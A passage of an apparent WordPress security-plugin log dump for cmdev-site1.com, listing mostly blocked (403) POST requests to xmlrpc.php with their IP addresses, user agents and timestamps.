Safari\\/537.36\"}','ufhYiPHbWIZN1tadGUEmc2gV',0,1679341178.3547,1577,'','GET',403,0,700,0,1,'',0),('185.26.122.75',3105520203,'','http://cmdev-site1.com/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; SM-A125F) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.105 Mobile Safari\\/537.36 OPR\\/63.3.3216.58675\"}','f6V82R5aq41idvPluUmFyI9Y',0,1679341178.3681,1563,'','GET',403,0,700,0,1,'',0),('150.60.232.16',2520573968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','84RoxD2YV0O1Eepbi3q7fuam',0,1679343358.9293,833,'','POST',403,0,515,0,1,'',0),('103.147.241.45',1737748781,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','uY4MGRQha5PvV2zCIO39sFtw',0,1679343360.2309,564,'','POST',403,0,515,0,1,'',0),('83.240.223.99',1408294755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','njfgRZkzVl93QsE0q4wrWt61',0,1679343366.8676,544,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','LQjKStf87VF4MZe35IsioWET',0,1679343406.0330,4222,'','POST',403,0,515,0,1,'',0),('103.75.184.151',1733015703,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','xOugW0X8LBqUkRTzn421Ctm6',0,1679343416.6162,583,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','hsOJayTDR5fSjZocteqkGIm7',0,1679343427.2614,605,'','POST',403,0,515,0,1,'',0),('65.21.78.116',1091915380,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','dDxAtn0V8CqyfXJboNFGuKhO',0,1679343438.2854,574,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','dWMzJm7UqNOFyQSIj6nc8tRr',0,1679343449.3890,550,'','POST',403,0,515,0,1,'',0),('162.0.229.212',2717967828,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','IHPVQze97qvUMnrsTKDAFiYC',0,1679343458.3594,607,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','1KwA3n2FfL896gbRNedM7zya',0,1679345086.3430,4039,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Zocngj7BTbK89prR0YxX4fhQ',0,1679345093.4381,549,'','POST',403,0,515,0,1,'',0),('34.102.77.202',577129930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','oMdPsE9npjW5riXvyzZVFNeJ',0,1679345105.0140,820,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','G3vzViCy41sKIh0kNFAlMTw7',0,1679345123.6918,588,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','0dbm9uVhwzOjPgFNo7xnC8a6',0,1679345140.3914,569,'','POST',403,0,515,0,1,'',0),('39.97.78.175',660688559,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','j60hm59QO2uya8nWHLGkiV7z',0,1679345147.1739,540,'','POST',403,0,515,0,1,'',0),('93.188.2.5',1572602373,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','g6yApWUSIZcCt7NvbPKFldez',0,1679345214.1129,686,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','VBhzUuODJ5LZMxPgmGYpl9tb',0,1679353196.8805,2721,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','PkiBRzN2dFOVhY1gD5GMwxmp',0,1679353196.8488,3432,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','xqfibK6pzh5m1IJLvUesrDu0',0,1679353203.9149,778,'','POST',403,0,515,0,1,'',0),('161.97.88.2',2707511298,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','aP1yJvUorR5KSMYF0qG4QcDA',0,1679353206.2472,566,'','POST',403,0,515,0,1,'',0),('82.223.120.189',1390377149,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','kt4drceXJCZIMOhW3a7Rfvi0',0,1679353211.4685,555,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','K34XcuxqQHEWps0lwYkM8BTA',0,1679353230.2819,588,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','x7M51FYtOPEy0I36oRDeH8cw',0,1679353236.1167,562,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','C3fukPlZjJ02DmLnzFa4QpTt',0,1679357409.1461,5292,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','cYF3gGo8wEjqdBNZHsRyDUhP',0,1679357409.5882,4854,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Qua2c47SAWfKHmCBX1wE6TbU',0,1679357415.7591,1191,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','gjO2XkyJmBev05hRT6wiuzrS',0,1679357425.4875,556,'','POST',403,0,515,0,1,'',0),('206.189.139.178',3468528562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','hR0GcUPK1NlJX9ZzQ4VDHavd',0,1679357435.0268,1169,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','J1PCOVdfSUpKMYliyvWaQhE7',0,1679357443.4441,562,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','Tm1XyZI6kexpPrJHz3nu9YFD',0,1679357464.2883,907,'','POST',403,0,515,0,1,'',0),('89.46.105.156',1496213916,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','ml3Bz28MDSHbWGir0eqFpcLx',0,1679357480.3913,649,'','POST',403,0,515,0,1,'',0),('65.21.78.116',1091915380,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','zDOyFmVHTga3dY7G1N2APnI0',0,1679357486.4259,591,'','POST',403,0,515,0,1,'',0),('93.188.2.5',1572602373,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','kEfdQUqrPG05NDzmIgo9l1aV',0,1679357568.0594,2781,'','POST',403,0,515,0,1,'',0),('54.39.222.194',908582594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','FMDcvalmbC98EjzKpohPuqtw',0,1679368199.1862,2469,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','FkYTnCONJmfyHp1S2B9v8XVc',0,1679368203.7705,763,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','zqjW1tM0mvc7SPOUpgIuobFh',0,1679368213.2460,1406,'','POST',403,0,515,0,1,'',0),('45.87.42.85',760687189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','5AuUdGcbw0LSiC4hOPytpxro',0,1679368234.7039,575,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','aFPJAbpMlBQyc24ehtz5dVgS',0,1679368246.4684,552,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','5rqvDtoymU1IWYJxQT283Xe9',0,1679369976.1087,3753,'','POST',403,0,515,0,1,'',0),('202.254.236.120',3405704312,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','MlDhjE1KqgyVaJGLeTQX4tpR',0,1679369976.5742,4020,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','sl6cIRhP4K9na7b5YDJMuHWz',0,1679369984.3623,549,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','lgv09ULRwxZmfqTrJ8DSAWPM',0,1679369993.9627,2688,'','POST',403,0,515,0,1,'',0),('78.47.198.54',1311753782,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','avTfp7HOeNgmbzKBFUEXiCD6',0,1679370001.8978,980,'','POST',403,0,515,0,1,'',0),('185.182.56.240',3115727088,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','X1jEtR8TyAIhKF4nHmsdYfSv',0,1679370003.2703,1553,'','POST',403,0,515,0,1,'',0),('156.230.169.138',2632362378,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','nJYp8XqoZCW7TwNLERufyekD',0,1679370011.0306,1019,'','POST',403,0,515,0,1,'',0),('51.210.156.16',869440528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','71rin9fOqpP3dkDaxoNMwmZB',0,1679370011.5768,755,'','POST',404,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','ZzaojNqrI5dV1E8pHYhwmn4e',0,1679370019.0226,763,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','qWUtdAeTEVCnQLXsc12ZMOmj',0,1679370019.6766,753,'','POST',403,0,515,0,1,'',0),('194.233.91.198',3270073286,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','woQXifAVY4rbdhPO8GCnx7B3',0,1679370021.0427,624,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','KpkAxi7BXlayOJGoNRQ62hdm',0,1679378241.3086,721,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','2QSbvulKf1rFjokIZJ9xHhUB',0,1679378243.2581,597,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','CuTjVhQfXZonNHBMmDRSeJUb',0,1679378244.0640,553,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','R3lSUva0hyX4pJVoesZPMktc',0,1679378256.0482,1821,'','POST',403,0,515,0,1,'',0),('143.125.250.2',2407397890,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','8nqYpWOxD1yhXKrzBMsfclCP',0,1679378256.3658,1899,'','POST',403,0,515,0,1,'',0),('135.181.136.149',2276821141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','aiF3AmBLPgzZkuNW10DOUHfn',0,1679378262.3613,560,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','bYfGZKl18y7UuH3Jv4pgq0PR',0,1679378267.6821,601,'','POST',403,0,515,0,1,'',0),('167.114.98.248',2809291512,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','pjFtd56bGEuB8OshARUHMKco',0,1679378281.4112,638,'','POST',403,0,515,0,1,'',0),('103.159.84.10',1738494986,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','lsdzYLrZ9I6qSCvu0aFVcGBQ',0,1679378284.8287,558,'','POST',403,0,515,0,1,'',0),('15.235.15.195',267063235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','92JlbXBqF6y3dTpSOtLQ1A0Z',0,1679382493.1671,5797,'','POST',403,0,515,0,1,'',0),('185.132.43.137',3112446857,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ZrsvKxzF3NMjXVIlHJQ42qn8',0,1679382493.4701,5494,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','lmLZqA9R4cfzFsIeTNQXh8aS',0,1679382502.1591,1426,'','POST',403,0,515,0,1,'',0),('91.204.46.244',1540108020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','fBbRFaJGKg7lNEQqLkjMe0dv',0,1679382502.6600,1245,'','POST',403,0,515,0,1,'',0),('23.88.103.105',391669609,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','FzPLMKH3nrCAke1lB5Ow8XEo',0,1679382511.9421,636,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','8uKtQlREoSe1GMH6gr9iadIO',0,1679382522.8497,2683,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','MRc3I2PmlFSV4XZKU69GHrxy',0,1679382525.5556,682,'','POST',403,0,515,0,1,'',0),('43.129.198.177',729925297,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Ry5oCA9hPlerMTaIWzN8Yug1',0,1679382532.4291,1829,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','gpDeZ5uAjaEK89zYoM0UHydB',0,1679382533.1667,1904,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Y7WOKp1Ua4yJklBEGth3jASc',0,1679382532.9709,2101,'','POST',403,0,515,0,1,'',0),('51.68.11.215',860097495,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','KvXjqsNVoGQazUTEuJ1hSHLi',0,1679382543.2179,641,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','LO4Mhv82iYJFoTzqtQnHVlPB',0,1679391187.6374,737,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','H9tjfITEmyogpw58WzAdLlRD',0,1679391189.0712,648,'','POST',403,0,515,0,1,'',0),('89.46.105.156',1496213916,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','A3HkUxRtL1cQb28ZOo7shETv',0,1679391198.9974,553,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','6WN708ucxRrLVHOjmzldDMpa',0,1679391211.0130,571,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','IJEOu9VYoltsLSvHjr8yGwfA',0,1679391218.0214,601,'','POST',403,0,515,0,1,'',0),('119.59.96.60',2000379964,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','ftTZsYhQ2gSv1bx9l3AOzLkW',0,1679391220.7229,652,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','hnYG5uZVP1JmcbkwWO3CIjRa',0,1679391221.4567,684,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','8AS0MUKFGNhevpOurYdZiTLX',0,1679391224.8591,571,'','POST',403,0,515,0,1,'',0),('43.129.198.177',729925297,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','DPjT4cUi7gBNWn9HmVwAb63d',0,1679391230.0557,620,'','POST',403,0,515,0,1,'',0),('65.21.78.116',1091915380,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','32UKZwlY6aC8ygGoiNzjLVHv',0,1679395645.6148,1358,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','325lVZYqwKeOuaJGWX0fbNjU',0,1679395645.8688,1273,'','POST',403,0,515,0,1,'',0),('83.240.223.99',1408294755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ieEvW3PY5HXxdjTS2rgyAhQz',0,1679395648.9382,577,'','POST',403,0,515,0,1,'',0),('160.153.146.149',2694419093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Y2Ld5IClU1oNRmhwDMZqWr3P',0,1679395651.7721,1279,'','POST',403,0,515,0,1,'',0),('91.204.46.244',1540108020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 